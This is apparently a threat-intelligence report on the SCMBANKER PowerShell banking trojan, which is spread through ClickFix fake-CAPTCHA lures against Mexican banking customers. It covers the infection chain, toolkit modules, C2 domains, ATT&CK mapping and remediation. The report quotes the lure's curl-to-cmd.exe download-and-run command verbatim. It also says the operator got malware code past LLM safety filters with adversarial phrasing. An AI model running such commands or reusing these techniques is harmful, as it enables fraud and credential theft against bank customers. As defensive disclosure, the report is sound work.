Threat reportMalwareTL-2026-1175
SCMBANKER PowerShell Banking Trojan Targets Mexican Financial Sector via ClickFix Fake CAPTCHA Lures (REF6045)
SCMBANKER PowerShell Banking Trojan Targets Mexican (TL-2026-1175), also tracked as REF6045, is a high-severity malware campaign, first published 2026-07-10. It is attributed to REF6045 operator with low confidence, affects Microsoft Windows (Run dialog / cmd.exe / PowerShell / VBScript hosts), maps to 30 MITRE ATT&CK techniques (T1010, T1016, T1027), and is covered by 9 detection rules and 35 indicators of compromise.
- Severity
- HIGHAssessed severity
- CVEs
- 0None referenced
- Techniques
- 30MITRE ATT&CK
- Actors
- 1REF6045 operator
- Detection rules
- 9SPL · KQL · Sigma
- IOCs
- 35Indicators of compromise
Key facts for TL-2026-1175
- Threat ID
- TL-2026-1175
- Also known as
- REF6045, SCMBANKER
- Severity
- HIGH
- Status
- ACTIVE
- Category
- MALWARE
- First published
- Last reviewed
- Attribution
- REF6045 operator
- Attribution confidence
- LOW
- Motivation
- FINANCIAL
- Target sectors
- financial services, banking, fintech, payment processors, cryptocurrency, investment platforms, government administration, telecom
- Target regions
- mexico, Latin America
- Detection rules
- 9
- Indicators of compromise
- 35
Malware and tooling in SCMBANKER PowerShell Banking Trojan Targets Mexican
Malware and tooling: SCMBANKER, Remote Utilities
How SCMBANKER PowerShell Banking Trojan Targets Mexican works
Elastic Security Labs tracked REF6045, an operator-assisted banking fraud campaign deploying the PowerShell-based SCMBANKER toolkit against Mexican banks, fintechs, payment processors, and crypto exchanges via ClickFix fake-CAPTCHA lures. The toolkit combines credential theft, clipboard hijacking (CLABE/card swapping), vishing overlays, screenshot exfiltration, and Remote Utilities RAT deployment, with strong evidence the code was AI-generated via an LLM prompted in Spanish.
REF6045 is an active, operator-assisted banking fraud operation tracked by Elastic Security Labs (researchers Jia Yu Chan and Salim Bitam), first observed with toolkit components dating to at least October 2025 and publicly disclosed 2026-07-08. Victims are lured to fake CAPTCHA verification pages styled as "Google Verificación Segura" that instruct them to paste and execute a command in the Windows Run dialog — the ClickFix social-engineering technique. The initial command (`cmd /c curl -k http://68.211.161.46/validation.txt | cmd.exe`) downloads a batch script that drives a six-stage execution chain: (1) launching Microsoft Edge in kiosk mode against fakeupdate.net to distract the victim with a fake Windows Update screen; (2) repeatedly relaunching with -Verb RunAs every 20 seconds to fatigue the victim into granting UAC admin consent, displaying the Spanish-language message "Se requieren permisos de administrador para actualizar su sistema..."; (3) confining the mouse cursor to a 1x1 pixel region via the Win32 ClipCursor API to prevent victim interference during installation; (4) using bitsadmin to pull the full PowerShell toolkit from an open directory to C:\Users\Public\; (5) establishing persistence via run.vbs (an HKCU Run key, three startup-folder copies, and an infection-timestamp marker id.txt); and (6) forcing a reboot via shutdown /r /t 02 to trigger the newly installed persistence.
The resulting SCMBANKER toolkit is a modular PowerShell-based banking trojan launched by run.vbs and comprising: cliente.ps1 (C2 beacon posting machine profile every 30 seconds), jujuzkt.ps1/jujuzkt2.ps1 (banking-session window-title monitoring and clipboard-based phishing redirection), mensaje1.ps1/mensaje.ps1/mensajeoff.ps1 (vishing dispatcher plus hard-lock and soft-lock fake bank-warning overlay windows), rotor1.ps1/screen2.ps1 (screenshot capture, ~42 screenshots per banking trigger over 5 minutes), rotor2.ps1/rotor.ps1 (process-name mutation wrappers), key.ps1 (Base64-obfuscated Win32 API keylogger with an unused Telegram exfiltration path, falling back to HTTP POST), clip.ps1/clip2.ps1 (CLABE and card-number clipboard hijackers using prefix/BIN matching to swap in attacker account numbers), avs.ps1/instaler.ps1/remoto.ps1 (silent deployment of the commercial Remote Utilities Host RAT, including registry-based callback configuration and UninstallString removal to resist removal), edifhjwe.ps1 (self-update mechanism that wipes and redeploys the toolkit while preserving state files), and correr.ps1 (arbitrary operator-issued PowerShell execution). cursor2.exe, a compiled AutoIt binary, replaces the system cursor with an invisible cursor to further obscure operator/victim interaction.
C2 infrastructure centers on negratomasa2026.online (and alternate gestionmontelavaria2026.online, plus IP-based fallback 185.242.246.169), exposing distinct endpoints for beaconing, banking alerts, screenshot exfiltration, keylog exfiltration, and remote-configuration text files controlling bank keyword lists, phishing redirect targets, vishing victim-IP mappings, and attacker CLABE/card numbers for clipboard substitution. ClickFix landing pages were hosted at ratonvaquero2026.online, monteviral2026.duckdns.org, and osogransd.online, with toolkit file staging on 68.211.161.46 and 216.250.112.100.
Elastic researchers assess the toolkit's source code was substantially AI-generated: consistent banner-comment scaffolding ("INTERVALOS DE TIEMPO", "DICCIONARIOS Y VARIABLES", "FUNCIONES", "INICIO", "LOOP PRINCIPAL"), clean function names paired with hand-shortened variables, instruction-like comments directly above corresponding code consistent with Copilot/Cursor-style assistant output, and self-documenting Base64 obfuscation (e.g., a literal comment identifying `user32.dll` immediately beside its Base64-encoded string). Profanity-laden comments cluster specifically in the mutation rotator and keylogger modules, suggesting the operator used adversarial phrasing to bypass LLM safety filters for those more sensitive components, then applied light manual obfuscation with minimal review. Operator OPSEC failures — an open directory exposing the entire toolkit, a briefly-hosted full web-root archive (zkt.zip), and an unauthenticated targeting-configuration editor at /b/editor.php — allowed Elastic to fully reconstruct the operation, including a live victim counter visible on the operator's dashboard confirming active, ongoing victimization of Mexican financial-sector customers.
MITRE ATT&CK techniques used in TL-2026-1175
Discovery
T1010 Application Window Discovery; T1016 System Network Configuration Discovery; T1082 System Information Discovery
Defense Evasion
T1027 Obfuscated Files or Information; T1036.005 Match Legitimate Resource Name or Location; T1070 Indicator Removal; T1140 Deobfuscate/Decode Files or Information; T1564.001 Hidden Files and Directories
Exfiltration
T1041 Exfiltration Over C2 Channel
Credential Access
Execution
T1059.001 PowerShell; T1059.003 Windows Command Shell; T1059.005 Visual Basic; T1204.001 Malicious Link
Command and Control
T1071.001 Web Protocols; T1102 Web Service; T1105 Ingress Tool Transfer; T1219 Remote Access Tools
Collection
T1113 Screen Capture; T1115 Clipboard Data; T1119 Automated Collection
stealth
Impact
T1529 System Shutdown/Reboot; T1657 Financial Theft
Persistence
T1547.001 Registry Run Keys / Startup Folder
Privilege Escalation
T1548.002 Bypass User Account Control
Initial Access
Resource Development
T1583.001 Domains; T1587.001 Malware
defense-impairment
Affected products and versions in SCMBANKER PowerShell Banking Trojan Targets Mexican
- Microsoft — Windows (Run dialog / cmd.exe / PowerShell / VBScript hosts)
Vulnerable versions: All supported Windows desktop versions - N/A — Mexican banking, fintech, payment processor, and cryptocurrency exchange customers
Vulnerable versions: End-user victims of ClickFix social engineering
Remediation for SCMBANKER PowerShell Banking Trojan Targets Mexican
Immediate actions
- Block C2 domains negratomasa2026[.]online, gestionmontelavaria2026[.]online, and IP 185.242.246[.]169 at web/DNS proxy and firewall
- Block ClickFix lure domains ratonvaquero2026[.]online, monteviral2026.duckdns[.]org, osogransd[.]online, ssinvestigaciones[.]com, and bancaporinternetbbmx[.]online
- Block file-staging hosts 68.211.161[.]46 and 216.250.112[.]100
- Alert on and block execution of curl/bitsadmin piping remote content directly to cmd.exe/PowerShell
- Hunt for HKCU Run key value 'run' pointing to run.vbs and for C:\Users\Public\ containing unexpected .ps1/.vbs/.txt artifacts
- Isolate and reimage any host with C:\Users\Public\id.txt, agent.txt, or 99.kut present
Workarounds
- Restrict local admin rights to reduce UAC-fatigue attack success
- Enforce application allow-listing to block unsigned PowerShell/VBScript execution from user-writable paths (C:\Users\Public, %APPDATA%)
Longer-term hardening
- Deploy endpoint controls to block/alert on the Windows Run dialog being used to execute curl/cmd/PowerShell one-liners (ClickFix pattern)
- User-awareness training on fake CAPTCHA/verification pages instructing users to paste commands into Run
- Restrict or monitor bitsadmin usage as a download utility on endpoints
- Deploy clipboard-integrity monitoring for banking/finance workstations to detect CLABE/card-number substitution
- Monitor for unauthorized installs of Remote Utilities Host (or other commercial RAT/RMM tools) outside sanctioned IT use
Weaknesses (CWE) in SCMBANKER PowerShell Banking Trojan Targets Mexican
Timeline of SCMBANKER PowerShell Banking Trojan Targets Mexican
- Earliest observed C2 screenshot-exfiltration timestamp (10:03 p.m. 08/12/2025) embedded in SCMBANKER's operator-facing communications format, indicating victim activity already being recorded and reported to operators.
- Earlier SCMBANKER toolkit components identified via VirusTotal pivoting, indicating active development since at least October 2025 with several months of iteration.
- REF6045 ClickFix campaign actively targeting Mexican banking, fintech, and cryptocurrency customers, per operator dashboard showing live victim counter.
- Elastic telemetry first surfaces a host using bitsadmin to download suspicious PowerShell scripts from an open directory, triggering the investigation that became REF6045.
- Elastic documents operator OPSEC failures including an open directory at 68.211.161.46 exposing the full toolkit and an unauthenticated targeting-configuration editor.
- The Hacker News, GBHackers, CyberPress, and SecurityBrief publish coverage of the SCMBANKER/REF6045 campaign disclosure.
- Elastic Security Labs researchers Jia Yu Chan and Salim Bitam publish REF6045 technical analysis detailing the SCMBANKER toolkit, C2 infrastructure, and AI-assisted development artifacts.
- TL-Intel-Harness ingests and researches the SCMBANKER/REF6045 campaign from RSS feed coverage.
Sources cited for SCMBANKER PowerShell Banking Trojan Targets Mexican
- REF6045: Mexican banking fraud toolkit with signs of AI-assisted development
- SCMBANKER Malware Uses ClickFix Lures to Target Mexican Banking Users
- REF6045 Uses SCMBANKER PowerShell Toolkit to Target Mexican Banking Customers
- Elastic finds AI-assisted banking fraud ring in Mexico
- SCMBANKER Malware Turns ClickFix Pages Into Operator-Assisted Mexican Banking Fraud
Detection coverage for TL-2026-1175
As of 2026-07-10, Threadlinqs Intelligence publishes 9 detection rule(s) for TL-2026-1175 across Splunk SPL, Microsoft KQL and Sigma, covering 35 indicator(s) of compromise. The whole corpus is readable without an account; a free account unlocks full detection query text in Splunk SPL, Microsoft KQL and Sigma; paid tiers add raw indicator values, correlation and the MCP server. Threadlinqs MCP server · View plans.